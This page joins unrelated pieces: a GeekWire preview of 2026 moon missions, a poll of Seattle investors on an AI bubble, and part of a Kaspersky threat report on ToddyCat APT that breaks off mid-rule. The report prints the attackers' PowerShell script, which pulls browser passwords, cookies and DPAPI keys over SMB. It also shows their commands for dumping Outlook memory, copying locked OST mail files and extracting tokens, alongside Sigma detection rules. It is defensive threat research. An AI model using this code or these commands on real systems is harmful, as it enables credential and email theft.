
Year in Space: Get ready for moon missions to take center stage in 2026

An artist’s conception shows the Orion spacecraft’s main engine firing during a lunar flyby, surrounded by eight auxiliary engines built by L3Harris’ Aerojet Redmond facility. (NASA Illustration)

Lunar missions once felt like the domain of history books rather than current events, but an upcoming trip around the moon is poised to generate headlines at a level not seen since the Apollo era.

NASA’s Artemis 2 mission, which is due to launch four astronauts on a round-the-moon journey as a warmup for a future lunar landing, is shaping up as the spaceflight highlight of 2026. NASA Administrator Jared Isaacman, who took the agency’s helm this month after a tumultuous year, says it’s the top item on his must-see list.

“What’s not to be excited about?” he said last week on CNBC. “We’re sending American astronauts around the moon. It’s the first time we’ve done that in a half-century. … We’re weeks away, potentially a month or two away at most from sending American astronauts around the moon again.”

The Pacific Northwest plays a significant role in the back-to-moon campaign. For example, L3Harris Technologies’ team in Redmond, Wash., built thrusters for Artemis 2’s Orion crew vehicle. And Artemis 2 isn’t the only upcoming moon mission with Seattle-area connections: Jeff Bezos’ Blue Origin space venture, headquartered in Kent, plans to send an uncrewed Blue Moon Mark 1 lander to the lunar surface in 2026 to help NASA get set for future moon trips.

“We are taking our first steps to help open up the lunar frontier for all of humanity,” Paul Brower, Blue Origin’s director of lunar operations, said in a recent LinkedIn post.

2026 could also be the year when Seattle-based Interlune sends its first prospecting instrument to the lunar surface to hunt for signs of helium-3, a rare material the company aims to bring back to Earth for use in fusion reactors or quantum computers.

As we close out 2025, here’s a look back at five of the past year’s space milestones and five trends to watch in the year to come.

Looking back at 2025

Blue Origin goes orbital: After a decade of development, Blue Origin launched its orbital-class New Glenn rocket for the first time in January, on a mission that lofted test equipment for its Blue Ring space mobility platform into orbit. A second launch in November sent NASA’s Escapade probes toward Mars and marked the first successful at-sea recovery of a New Glenn booster. On the suborbital side, Blue Origin’s New Shepard program provided rides to space for seven crews. Notable passengers included Lauren Sanchez, who became Bezos’ wife two months after her flight; Justin Sun, the crypto entrepreneur who paid $28 million for his space ticket; and Michaela Benthaus, the first wheelchair user to fly to space.

Amazon’s satellite network gets down to business: The first operational satellites for Amazon’s space-based broadband internet service were launched in April. The network’s name was changed from Project Kuiper to Amazon Leo in November. Terminals have been shipped to early-stage customers for a preview program, and the rollout is expected to gather steam in 2026. Meanwhile, SpaceX continues to grow its Starlink network, with more than 9,300 satellites providing high-speed internet service to more than 9 million customers worldwide.

Rubin Observatory delivers first images: A decade and a half ago, Microsoft’s Bill Gates and Charles Simonyi donated $30 million to support the creation of a giant sky-survey telescope in Chile. In June, the Rubin Observatory finally made its star-studded debut, with Simonyi in attendance. Researchers at the University of Washington played key roles in shepherding the $800 million project to completion.

A first for orbital data centers: Redmond-based Starcloud sent an Nvidia GPU chip into orbit in November, and weeks later it claimed to be the first company to train an artificial intelligence model in space. The achievement marked one small step in Starcloud’s campaign to create a network of data centers in orbit. Several tech titans — including Bezos, OpenAI’s Sam Altman, SpaceX’s Elon Musk and Google’s Sundar Pichai — see orbital data centers as a way to satisfy the growing hunger for AI processing resources on Earth. Some say the trend is driving SpaceX’s plans to go public in 2026.

SpaceX’s Starship goes through ups and downs: Many of SpaceX’s ambitions, ranging from orbital data centers to moon landings to Mars migrations, depend on the successful development of its Starship super-rocket. Starship also plays a crucial role in the business models for lots of space startups, including Starcloud and a Seattle-based space travel venture called Orbite. Three Starship test flights ended badly in the first half of 2025, but SpaceX bounced back with two successful test flights in the second half of the year. Now SpaceX is working on an upgraded version of Starship — and dealing with the aftermath of a booster anomaly that occurred during a pressurization test in November.

Looking ahead to 2026

Artemis 2 to send humans around the moon: For the first time since Apollo 17 in 1972, humans will leave Earth orbit. The current plan calls for the Artemis 2 mission to take place in the February-to-April time frame. A crew of four — three Americans and one Canadian astronaut — will climb into the Orion spacecraft and be sent into space atop NASA’s Space Launch System rocket. The round-the-moon route will be similar to the trajectory used for NASA’s uncrewed Artemis 1 flight in 2022. If Artemis 2 goes well, that could set the stage for an Artemis 3 crewed lunar landing as early as 2027 (but more likely later).

Jeff Bezos and Blue Origin employees pose for a picture in front of the Blue Moon Mark 1 lunar lander. (Blue Origin Photo)

Blue Moon’s lunar delivery: Blue Origin’s uncrewed lander is tasked with delivering a NASA experiment called SCALPSS to the moon’s south polar region. Stereo cameras will document how the landing burn interacts with the dusty lunar surface — and the results will be factored into plans for future landings. This Blue Moon Mark 1 mission will blaze a trail for Blue Origin’s Mark 2 lander, which is due to start taking astronauts to the lunar surface in 2030. Other robotic spacecraft scheduled for moon landings in 2026 include China’s Chang’e 7 rover, Firefly’s Blue Ghost 2 lander, Intuitive Machines’ IM-3 lander and Astrobotic’s Griffin lander (which will be carrying two mini-rovers and Interlune’s helium-hunting camera).

Seattle space companies count down to liftoff: In addition to Blue Origin, several other companies headquartered near the Emerald City are planning big space missions in 2026. Kent-based Stoke Space could launch its first fully reusable Nova rocket from Florida. Bothell-based Portal Space Systems’ Starburst space vehicle is due to make its orbital debut. And Tukwila-based Starfish Space is scheduled to demonstrate how its maneuverable Otter spacecraft can give satellites an in-space boost.

Golden Dome takes shape: A proposed $175 billion missile defense system known as the Golden Dome is already attracting interest from space ventures — particularly ventures that are focusing on in-space mobility (such as Portal Space and Starfish Space) or in-space data processing (such as Starcloud and Seattle-based Sophia Space). Marysville, Wash.-based Gravitics is building an orbital carrier that would serve as a “pre-positioned launch pad in space” for the U.S. Space Force, under the terms of a deal that could be worth as much as $60 million. Other big-ticket military projects are likely to come to light in 2026.

Whither NASA? Or will NASA wither? Isaacman is taking over at NASA following a year of layoffs and science program cuts. He has pledged to land astronauts on the moon during the current presidential term, but funding remains a hurdle. “I almost guarantee you he’s going to be walking up the street to the White House, saying ‘I really need more money,’” NASAWatch’s Keith Cowing said on Israel’s i24 TV.

Bonus: Coming to a sky (or a screen) near you: Keep an eye out for a total lunar eclipse on March 3 that will be visible over the U.S., weather permitting. There’s also a solar eclipse on Aug. 12 that will bring totality to narrow stretches of Greenland, Iceland and Spain. Although this eclipse can’t be seen in Seattle’s skies, you should be able to catch the highlights online.

Is there an AI bubble? Investors sound off on risks and opportunities for tech startups in 2026

From top left, clockwise: Sheila Gulati, Cameron Borumand, Annie Luchsinger, Chris DeVore, Sabrina Albert (Wu), and Andy Liu.

AI has attracted unprecedented levels of capital and attention. And questions are growing about the so-called AI bubble: Are too many startups chasing the same ideas? Are valuations running ahead of real adoption? And will all this investment pay off — or pop?

GeekWire polled a handful of Seattle-area venture capitalists about whether they think an AI bubble exists, and how startups should prepare as they plan for 2026.

Taken together, the investors paint a picture of a market that is overheated in places, but far from broken. They see clear signs of excess in AI — especially in early-stage private companies where valuations often outpace real traction. But they largely reject the idea of a catastrophic bubble, and most argue that the technology itself is already delivering real value.

They differ on the details: Some see the biggest excess in data center buildouts. Others point to narrative-driven startups raising at huge valuations without real customer traction. One investor puts AI’s full impact 10 to 20 years out. Another sees immediate opportunity as companies rethink their software spending, making longtime vendors vulnerable.

Their advice to startup founders: ignore the hype, focus on real customer problems, build durable revenue and efficient businesses, and be ready for some market cooling.

Read their full responses below.

Sabrina Albert (Wu), partner at Madrona

Sabrina Albert (Wu). (Madrona Photo)

“There’s clear froth in parts of the AI market, especially in early-stage private valuations where companies are priced well ahead of fundamentals, which fits a classic ‘bubble’ definition. In the public markets, the strongest AI companies are backing valuations with outsized earnings and growth, so it doesn’t look like a traditional bubble there.

The most pronounced exuberance is in the private markets, particularly at seed and Series A, where many investors are trying to get in earlier on AI exposure. As a result, capital is chasing startups with limited traction and valuations that price in outcomes that may take years of execution to justify.

Startups should focus on durable business fundamentals early on. Build repeatable revenue through annual or multi-year contracts, solve real customer problems, and differentiate by integrating deeply into the customer tech stack to create real product and company flywheels. Long-term success comes from delivering measurable value and defensible growth over time.”

Cameron Borumand, general partner at Fuse

Cameron Borumand. (Fuse Photo)

“Many factors are at play here. You have a new and genuinely transformative technology in AI. Over the long term, it will radically reshape how nearly every industry operates. At the same time, history tells us that new technologies tend to be overestimated in the short term and underestimated in the long term. The most profound, fully realized impacts of AI may still be 10-to-20 years away.

In the near term (the next few years), I expect some pullback in the public markets as investors come to terms with the fact that true ‘enterprise readiness’ for AI will take time. This doesn’t suggest anything catastrophic — just that the roughly 21 percent year-over-year growth we’ve seen in the Nasdaq is unlikely to be sustainable and may revert closer to the 30-year average of around 10 percent. After a few meaningful pullbacks, pundits will inevitably claim that AI is overhyped. In reality, this would simply represent a normalization after an extraordinary, AI-fueled run in the public markets.

Late-stage private markets will see some overly hyped companies — this happens in every boom cycle. The winners will be bigger than ever, but the losses will also be bigger than ever. When you have companies like Anthropic growing from $1 billion to a projected $9 billion of revenue in 2025, it’s clear that AI is already delivering real, material impact in the world.

For startups, there’s no better time to be building than now. M&A markets are back, customers have budget, and talent wants to work on interesting projects. With that said, there is a lot of noise, so it’s best to go deep and really focus on a core customer problem. Most of the growth we’ve seen to date is in the infrastructure layer — the next few years will be about the next generation of AI-powered applications.”

Chris DeVore, founding managing partner at Founders’ Co-op

Chris DeVore speaks at the GeekWire Summit in 2022. (GeekWire File Photo / Dan DeLong)

“Yes, a significant amount of capital being deployed globally in AI (and particularly in the data center buildout) is almost certainly being misallocated. Specifically in startups, outside a few presumed winners (OpenAI, Anthropic, Cursor), the concern is less overcapitalization and more the prices at which financings are being done relative to the actual cash flows and margin potential of the companies being financed.

That said, unlike some recent bubbles I can think of (crypto, metaverse, etc.) there are actual babies in the bathwater this time. LLMs are remarkably capable tools even at their current state of development, and will remain core to many software development and knowledge work tasks long after rationality has returned to the financial landscape.

The founder and investor challenge in moments like the current one is how to make decisions that will look smart ten years from now, not just in the current moment. Are there ways to apply LLMs to create durable business value in segments of the economy that are not likely to be overcapitalized or competed to zero by the near-term flood of dollars? The only alternative strategy is to try to pick winners in the capital wars and pay whatever the market demands for those assets, but history suggests that’s a very low odds proposition for even the best players.

The recipe for success in times like this is not that different from any other time: pick a customer segment that you understand better than anyone else, engage deeply with those customers to understand what problems you can uniquely solve with LLMs that were too hard or expensive to solve previously, build quickly and iteratively to show value to those customers, and maintain that pace of shipping and learning for as long as you can.

That may sound simple, but it’s remarkable how few founding teams are able to pull it off, and that’s why startups are so hard, and so fun.”

Sheila Gulati, managing director at Tola Capital

Sheila Gulati of Tola Capital. (GeekWire File Photo)

“Broadly, I don’t think we’re in an AI bubble right now. Similar concerns existed when we launched the Azure platform about fifteen years ago. Back then, people were initially worried about racing to a zero-margin business. 

Today’s massive AI infrastructure buildouts will shape the operational software layers that drive real-world performance — compute orchestration, data pipelines, memory systems, and large-scale inference efficiency. Value is shifting toward packaging and deploying intelligence across enterprise workflows. 

Enterprise software startups should position themselves in the growing TAM of delivering full, end-to-end solutions and new ways of doing things where humans collaborate with AI agents. Winning startups will encompass both the growing IT TAM and economics of a portion of the labor market as well.

We are now seeing unprecedented malleability of CIO budgets. The deeply entrenched application stack can now shift to new players which are built with AI from the ground up. The market opportunity is massive, and companies should set their sights on building the new megacaps, not minor feature companies.”

Andy Liu, co-founding partner at Unlock Venture Partners

Andy Liu.

“Yes, we are in an AI bubble, but not in the way most people think.

Capital and valuations are running well ahead of fundamentals, particularly for companies without clear customer pull, durable differentiation, or credible/reasonable paths to profitability. We’re seeing a growing gap between narrative-driven AI companies where ‘AI’ is largely a positioning exercise, and value-driven AI companies that use the technology to deliver measurable, repeatable value for customers.

The bubble seems most pronounced at the early and growth stages where AI storytelling can temporarily substitute for traction and raise capital at lofty valuations. Some strong companies will emerge from this cycle, but there will be meaningful drawdowns, recaps, or shutdowns as many startups fail to grow into those expectations.

Looking ahead to 2026, my advice to founders is straightforward:

  • Build real businesses, not decks. Products today can be built quickly with real revenue before raising capital.
  • Prioritize efficiency, customer ROI, and unit economics.
  • Use AI to create real leverage, not excuses for burning capital.

2026 is going to be an incredible moment to build. The cost of experimentation and building products has collapsed, and founders no longer need educational credentials (CS degrees or an MBA) to create real products and revenue. The next generation of durable AI companies will be built by small teams who focus less on hype and more on efficient execution. We’re definitely excited to see more teams building incredible products this upcoming year.”

Annie Luchsinger, partner at Breakers

Annie Luchsinger.

“From my perspective, what we’re seeing is less an AI bubble and more a classic venture cycle playing out around a genuinely transformative platform shift. Venture has always adapted to new normals alongside major technology inflections (cloud, mobile, social), and AI is the fastest-moving one we’ve seen to date.

The difference this time is speed, scale, and capital availability. AI adoption is happening at a faster clip and at a much larger scale than prior platform shifts, all while private-market capital has reached historic highs. As those forces collide, pricing, timelines, and investor behavior evolve.

Capital moving ahead of fundamentals is not new. There will be some shakeouts, but that doesn’t mean underlying value creation isn’t happening. Companies with real technology, real distribution, and real customers will endure.”

ToddyCat: your hidden email assistant. Part 1

Introduction

Email remains the main means of business correspondence at organizations. It can be set up either using on-premises infrastructure (for example, by deploying Microsoft Exchange Server) or through cloud mail services such as Microsoft 365 or Gmail. However, some organizations do not provide domain-level access to their cloud email. As a result, attackers who have compromised the domain do not automatically gain access to email correspondence and must resort to additional techniques to read it.

This research describes how ToddyCat APT evolved its methods to gain covert access to the business correspondence of employees at target companies. In the first part, we review the incidents that occurred in the second half of 2024 and early 2025. In the second part of the report, we focus in detail on how the attackers implemented a new attack vector as a result of their efforts. This attack enables the adversary to leverage the user’s browser to obtain OAuth 2.0 authorization tokens. These tokens can then be utilized outside the perimeter of the compromised infrastructure to access corporate email.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

TomBerBil in PowerShell

In a previous post on the ToddyCat group, we described the TomBerBil family of tools, which are designed to extract cookies and saved passwords from browsers on user hosts. These tools were written in C# and C++.

Yet, analysis of incidents from May to June 2024 revealed a new variant implemented in PowerShell. It retained the core malicious functionality of the previous samples but employed a different implementation approach and incorporated new commands.

A key feature of this version is that it was executed on domain controllers on behalf of a privileged user, accessing browser files via shared network resources using the SMB protocol.

Besides supporting the Chrome and Edge browsers, the new version also added processing for Firefox browser files.

The tool was launched using a scheduled task that executed the following command line:

powershell -exec bypass -command "c:\programdata\ip445.ps1"
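For defenders, the launch mechanism itself is a useful hunting signal. The PowerShell sketch below is illustrative only (it is not part of the attacker’s toolset) and assumes the ScheduledTasks module is available: it flags scheduled tasks whose action runs PowerShell with an execution-policy bypass against a script under C:\ProgramData, the pattern shown above.

# Illustrative hunting sketch: flag scheduled tasks whose action launches
# PowerShell with "-exec bypass" on a script under C:\ProgramData,
# matching the launch pattern described above.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match '(?i)powershell' -and
            $cmd -match '(?i)-exec(utionpolicy)?\s+bypass' -and
            $cmd -match '(?i)\\programdata\\.*\.ps1') {
            [pscustomobject]@{
                TaskName = $task.TaskName
                TaskPath = $task.TaskPath
                Command  = $cmd
            }
        }
    }
}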

The script begins by creating a new local directory, which is specified in the $baseDir variable. The tool saves all data it collects into this directory.

$baseDir = 'c:\programdata\temp\'

try{
	New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{
	
}

The script defines a function named parseFile, which accepts a full file path as a parameter. It opens the specified file (here, C:\programdata\uhosts.txt) and reads its content line by line using .NET Framework classes, returning the result as a string array. This is how the script builds its array of host names.

function parseFile{
    param(
        [string]$fileName
    )
    
    $fileReader=[System.IO.File]::OpenText($fileName)

    while(($line = $fileReader.ReadLine()) -ne $null){
        try{
            $line.trim()
            }
        catch{
        }
    }
    $fileReader.close()
}

For each host in the array, the script attempts to establish an SMB connection to the shared resource c$, constructing the path in the \\<host>\c$\users\ format. If the connection is successful, the tool retrieves a list of user directories present on the remote host. If at least one directory is found, a separate folder is created for that host within the $baseDir working directory:

foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
    $myhost=$myhost.TrimEnd()
    $open=$false
    
    $cpath = "\\{0}\c$\users\" -f $myhost
    $items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)
	
	$lpath = $baseDir + $myhost
	try{
		New-Item -ItemType directory -Path $lpath | Out-Null
	}catch{
		
	}

In the next stage, the script iterates through the user folders discovered on the remote host, skipping any folders specified in the $filter_users variable, which is defined upon launching the tool. For the remaining folders, three directories are created in the script’s working folder for collecting data from Google Chrome, Mozilla Firefox, and Microsoft Edge.

$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){
	
	$username = $item.Name
	if($filter_users -contains $username.tolower()){
		continue
	}
	$upath = $lpath + '\' + $username
	
	try{
		New-Item -ItemType directory -Path $upath | Out-Null
		New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
		New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
		New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
	}catch{
		
	}

Next, the tool searches the remote host for the following Chrome and Edge browser files in the Default profile:

  • Login Data: a database file that contains the user’s saved logins and passwords for websites in an encrypted format
  • Local State: a JSON file containing the encryption key used to encrypt stored data
  • Cookies: a database file that stores HTTP cookies for all websites visited by the user
  • History: a database that stores the browser’s history

These files are copied via SMB to the local folder within the corresponding user and browser folder hierarchy. Below is a code snippet that copies the Login Data file:

$googlepath = $upath + '\google\'
$firefoxpath = $upath + '\firefox\'
$edgepath = $upath + '\edge\'
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if(test-path -path $loginDataPath){
	$dstFileName = "{0}\{1}" -f $googlepath,'Login Data'
	copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}

The same procedure is applied to Firefox files, with the tool additionally traversing all of the browser’s user profile folders. Instead of the Chrome and Edge files described above, the script searches for files whose names are listed in the $firefox_files array and which contain similar information. The requested files are also copied to the tool’s local folder.

$firefox_files = @('key3.db','signons.sqlite','key4.db','logins.json')

$firefoxBase = $item.FullName + '\AppData\Roaming\Mozilla\Firefox\Profiles'
if(test-path -path $firefoxBase){
	$profiles = @(get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue)
	foreach($profile in $profiles){
		if(!(test-path -path ($firefoxpath + '\' + $profile.Name))){
			New-Item -ItemType directory -Path ($firefoxpath + '\' + $profile.Name) | Out-Null
		}
		foreach($firefox_file in $firefox_files){
			$tmpPath = $firefoxBase + '\' + $profile.Name + '\' + $firefox_file
			if(test-path -Path $tmpPath){
				$dstFileName = "{0}\{1}\{2}" -f $firefoxpath,$profile.Name,$firefox_file
				copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
			}
		}
	}
}

The copied files are encrypted using the Data Protection API (DPAPI). The previous version of TomBerBil ran on the host and copied the user’s token, so DPAPI could be used within the user’s current session to decrypt the master key and, subsequently, the files. The updated server-side version of TomBerBil instead copies the files containing the user encryption keys used by DPAPI. These keys, combined with the user’s SID and password, allow the attackers to decrypt all the copied files locally.

if(test-path -path ($item.FullName + '\AppData\Roaming\Microsoft\Protect')){
	copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Roaming\Microsoft\Protect') -Destination ($upath + '\') | Out-Null
}
if(test-path -path ($item.FullName + '\AppData\Local\Microsoft\Credentials')){
	copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Local\Microsoft\Credentials') -Destination ($upath + '\') | Out-Null
}

With TomBerBil, the attackers automatically collected user cookies, browsing history, and saved passwords, while simultaneously copying the encryption keys needed to decrypt the browser files. The connection to the victim’s remote hosts was established via the SMB protocol, which significantly complicated the detection of the tool’s activity.

TomBerBil in PowerShell

As a rule, such tools are deployed at later stages, after the adversary has established persistence within the organization’s internal infrastructure and obtained privileged access.

Detection

To detect this attack, it’s necessary to set up auditing for access to browser folders and to monitor attempts to reach those folders over network protocols such as SMB.

title: Access To Sensitive Browser Files Via Smb
id: 9ac86f68-9c01-4c9d-897a-4709256c4c7b
status: experimental
description: Detects remote access attempts to browser files containing sensitive information
author: Kaspersky
date: 2025-08-11
tags:
    - attack.credential-access
    - attack.t1555.003
logsource:
    product: windows
    service: security
detection:
    event:
        EventID: '5145'
    chromium_files:
        ShareLocalPath|endswith:
            - '\User Data\Default\History'
            - '\User Data\Default\Network\Cookies'
            - '\User Data\Default\Login Data'
            - '\User Data\Local State'
    firefox_path:
        ShareLocalPath|contains: '\AppData\Roaming\Mozilla\Firefox\Profiles'
    firefox_files:
        ShareLocalPath|endswith:
            - 'key3.db'
            - 'signons.sqlite'
            - 'key4.db'
            - 'logins.json'
    condition: event and (chromium_files or firefox_path and firefox_files)
falsepositives: Legitimate activity
level: medium

In addition, auditing for access to the folders storing the DPAPI encryption key files is also required.

title: Access To System Master Keys Via Smb
id: ba712364-cb99-4eac-a012-7fc86d040a4a
status: experimental
description: Detects remote access attempts to the Protect file, which stores DPAPI master keys
references:
    - https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary
author: Kaspersky
date: 2025-08-11
tags:
    - attack.credential-access
    - attack.t1555
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: '5145'
        ShareLocalPath|contains: 'windows\System32\Microsoft\Protect'
    condition: selection
falsepositives: Legitimate activity
level: medium
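The two rules above can also be applied directly with PowerShell on a domain controller or file server. The sketch below is a minimal illustration rather than a production detection: it assumes the “Detailed File Share” audit subcategory is enabled so that Event ID 5145 is written to the Security log, and it simply filters recent events for the browser and DPAPI paths referenced in the rules.

# Illustrative only. Prerequisite (elevated prompt):
#   auditpol /set /subcategory:"Detailed File Share" /success:enable
# Event ID 5145 then records each file accessed on a network share over SMB.
$pattern = 'User Data\\Default\\Login Data|User Data\\Default\\Network\\Cookies|' +
           'User Data\\Default\\History|User Data\\Local State|' +
           'Mozilla\\Firefox\\Profiles|Microsoft\\Protect'
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5145 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match $pattern } |
    Select-Object TimeCreated, MachineName, Message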

Stealing emails from Outlook

The modified TomBerBil tool family proved ineffective at evading monitoring tools, compelling the threat actor to seek alternative methods for accessing the organization’s critical data. We discovered an attempt to gain access to corporate correspondence files in the local Outlook storage.

The Outlook application stores OST (Offline Storage Table) files for offline use. The names of these files contain the address of the mailbox being cached. Outlook uses OST files to store a local copy of data synchronized with mail servers: Microsoft Exchange, Microsoft 365, or Outlook.com. This capability allows users to work with emails, calendars, contacts, and other data offline, then synchronize changes with the server once the connection is restored.

However, access to an OST file is blocked by the application while Outlook is running. To copy the file, the attackers created a specialized tool called TCSectorCopy.

TCSectorCopy

This tool is designed for block-by-block copying of files that may be inaccessible by applications or the operating system, such as files that are locked while in use.

The tool is a 32-bit PE file written in C++. After launch, it processes parameters passed via the command line: the path to the source file to be copied and the path where the result should be saved. The tool then validates that the source path is not identical to the destination path.

Validating the TCSectorCopy command line parameters

Next, the tool gathers information about the disk hosting the file to be copied: it determines the cluster size, file system type, and other parameters necessary for low-level reading.

Determining the disk’s file system type

TCSectorCopy then opens the disk as a device in read-only mode and sequentially copies the file content block by block, bypassing the standard Windows API. This allows the tool to copy even the files that are locked by the system or other applications.

The adversary uploaded this tool to the target host and used it to copy user OST files:

xCopy.exe  C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2

Having obtained the OST files, the attackers processed them using a separate tool to extract the email correspondence content.

XstReader

XstReader is an open-source C# tool for viewing and exporting the content of Microsoft Outlook OST and PST files. The attackers used XstReader to export the content of the previously copied OST files.

XstReader is executed with the -e parameter and the path to the copied file. The -e parameter specifies the export of all messages and their attachments to the current folder in the HTML, RTF, and TXT formats.

XstExport.exe -e <email>@<domain>.ost2

After exporting the data from the OST file, the attackers review the list of obtained files, collect those of interest into an archive, and exfiltrate it.

Stealing data with TCSectorCopy and XstReader

Detection

To detect unauthorized access to Outlook OST files, it’s necessary to set up auditing for the %LOCALAPPDATA%\Microsoft\Outlook\ folder and monitor access events for files with the .ost extension. The Outlook process and other processes legitimately using this file must be excluded from the audit.

title: Access To Outlook Ost Files
id: 2e6c1918-08ef-4494-be45-0c7bce755dfc
status: experimental
description: Detects access to the Outlook Offline Storage Table (OST) file
author: Kaspersky
date: 2025-08-11
tags:
    - attack.collection
    - attack.t1114.001
logsource:
    product: windows
    service: security
detection:
    event:
        EventID: 4663
    outlook_path:
        ObjectName|contains: '\AppData\Local\Microsoft\Outlook\'
    ost_file:
        ObjectName|endswith: '.ost'
    condition: event and outlook_path and ost_file
falsepositives: Legitimate activity
level: low
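A minimal way to generate and review these events with PowerShell is sketched below. It is illustrative only and assumes the “Audit File System” subcategory is enabled and the session runs with administrative rights (SeSecurityPrivilege): it adds a read-audit SACL to the current user’s Outlook cache folder, then looks for Event ID 4663 entries on .ost files where the accessing process is not Outlook itself.

# Illustrative only: add a SACL so successful reads in the Outlook cache folder
# produce Event ID 4663 (requires the "Audit File System" subcategory and
# administrative rights), then hunt for non-Outlook processes touching .ost files.
$outlookDir = Join-Path $env:LOCALAPPDATA 'Microsoft\Outlook'
$acl  = Get-Acl -Path $outlookDir -Audit
$rule = New-Object System.Security.AccessControl.FileSystemAuditRule('Everyone', 'ReadData', 'ContainerInherit,ObjectInherit', 'None', 'Success')
$acl.AddAuditRule($rule)
Set-Acl -Path $outlookDir -AclObject $acl

Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Message -match '\\AppData\\Local\\Microsoft\\Outlook\\.*\.ost' -and
        $_.Message -notmatch 'OUTLOOK\.EXE'
    } |
    Select-Object TimeCreated, Message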

The TCSectorCopy tool accesses the OST file via the disk device, so to detect it, it’s important to monitor events such as Event ID 9 (RawAccessRead) in Sysmon. These events indicate reading directly from the disk, bypassing the file system.

As we mentioned earlier, TCSectorCopy receives the path to the OST file via a command line. Consequently, detecting this tool’s malicious activity requires monitoring for a specific OST file naming pattern: the @ symbol and the .ost extension in the file name.

Example of detecting TCSectorCopy activity in KATA
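If Sysmon telemetry is available, both signals can be checked with a short PowerShell query. The sketch below is illustrative and assumes Sysmon logs to its default Microsoft-Windows-Sysmon/Operational channel: it lists RawAccessRead events (Event ID 9) and process-creation events (Event ID 1) whose command line contains a mailbox-style file name with the @ symbol and the .ost extension.

# Illustrative only. Assumes Sysmon writes to its default operational channel.
$sysmonLog = 'Microsoft-Windows-Sysmon/Operational'

# 1) Raw reads of the disk device, bypassing the file system (Sysmon Event ID 9).
Get-WinEvent -FilterHashtable @{ LogName = $sysmonLog; Id = 9 } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message

# 2) Process creation (Sysmon Event ID 1) with an OST file name in the command line.
Get-WinEvent -FilterHashtable @{ LogName = $sysmonLog; Id = 1 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'CommandLine:.*@\S*\.ost' } |
    Select-Object TimeCreated, Message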

Stealing access tokens from Outlook

Since active file collection actions on a host are easily tracked using monitoring systems, the attackers’ next step was gaining access to email outside the hosts where monitoring was being performed. Some target organizations used the Microsoft 365 cloud office suite. The attackers attempted to obtain the access token that resides in the memory of processes utilizing this cloud service.

In the OAuth 2.0 protocol, which Microsoft 365 uses for authorization, the access token is used when requesting resources from the server. In Outlook, it is specified in API requests to the cloud service to retrieve emails along with attachments. Its disadvantage is its relatively short lifespan; however, this can be enough to retrieve all emails from a mailbox while bypassing monitoring tools.

The access token is stored using the JWT (JSON Web Tokens) standard. The token content is encoded using Base64. JWT headers for Microsoft applications always specify the typ parameter with the JWT value first. This means that the first 18 characters of the encoded token will always be the same.

The attackers used SharpTokenFinder to obtain the access token from the user’s Outlook application. This tool is written in C# and designed to search for an access token in processes associated with the Microsoft 365 suite. After launch, the tool searches the system for the following processes:

  • “TEAMS”
  • “WINWORD”
  • “ONENOTE”
  • “POWERPNT”
  • “OUTLOOK”
  • “EXCEL”
  • “ONEDRIVE”
  • “SHAREPOINT”

If these processes are found, the tool attempts to open each process object using the OpenProcess function and dump its memory. To do this, the tool imports the MiniDumpWriteDump function from dbghelp.dll, which writes user-mode minidump information to the specified file. The dump files are saved in the dump folder, located in the current SharpTokenFinder directory. After creating dump files for the processes, the tool searches each of them for the following string pattern:

"eyJ0eX[a-zA-Z0-9\\._\\-]+"

This template uses the first six characters of the encoded JWT token, which are always the same; the token’s sections are separated by dots. This is sufficient to find the necessary string in the process memory dump.

Example of a JWT token
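The two observations above are easy to verify. The short PowerShell sketch below is illustrative only and uses a hypothetical header value, not a real Microsoft 365 token: decoding the Base64 header shows why every token starts with the same characters, and that prefix is what the search pattern keys on.

# Illustrative only; the header below is a hypothetical example, not a real token.
$sampleHeader = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9'
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($sampleHeader))
# -> {"typ":"JWT","alg":"RS256"}   (hence the constant "eyJ0eX..." prefix)

# The same prefix drives the memory-search pattern quoted above.
$pattern = 'eyJ0eX[a-zA-Z0-9\._\-]+'
('noise ' + $sampleHeader + '.payload.signature noise') -match $pattern   # True
$Matches[0]   # the token-like substring that was found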

In the incident being described, the local security tools (EPP) blocked the attempt to create the OUTLOOK.exe process dump using SharpTokenFinder, so the operator used ProcDump from the Sysinternals suite for this purpose:

procdump64.exe -accepteula -ma OUTLOOK.exe
dir c:\windows\temp\OUTLOOK.EXE_<id>.dmp
c:\progra~1\winrar\rar.exe a -k -r -s -m5 -v100M %temp%\dmp.rar c:\windows\temp\OUTLOOK.EXE_<id>.dmp

Here, the operator executed ProcDump with the following parameters:

  • -accepteula silently accepts the license agreement without displaying the agreement window.
  • -ma indicates that a full process dump should be created.
  • OUTLOOK.exe is the name of the process to be dumped.

The dir command is then executed as a check to confirm that the file was created and is not zero size. Following this validation, the file is added to a dmp.rar archive using WinRAR. The attackers sent this file to their host via SMB.

Detection

To detect this technique, it’s necessary to monitor the ProcDump process command line for names belonging to Microsoft 365 application processes.

title: Dump Of Office 365 Processes Using Procdump
id: 5ce97d80-c943-4ac7-8caf-92bb99e90e90
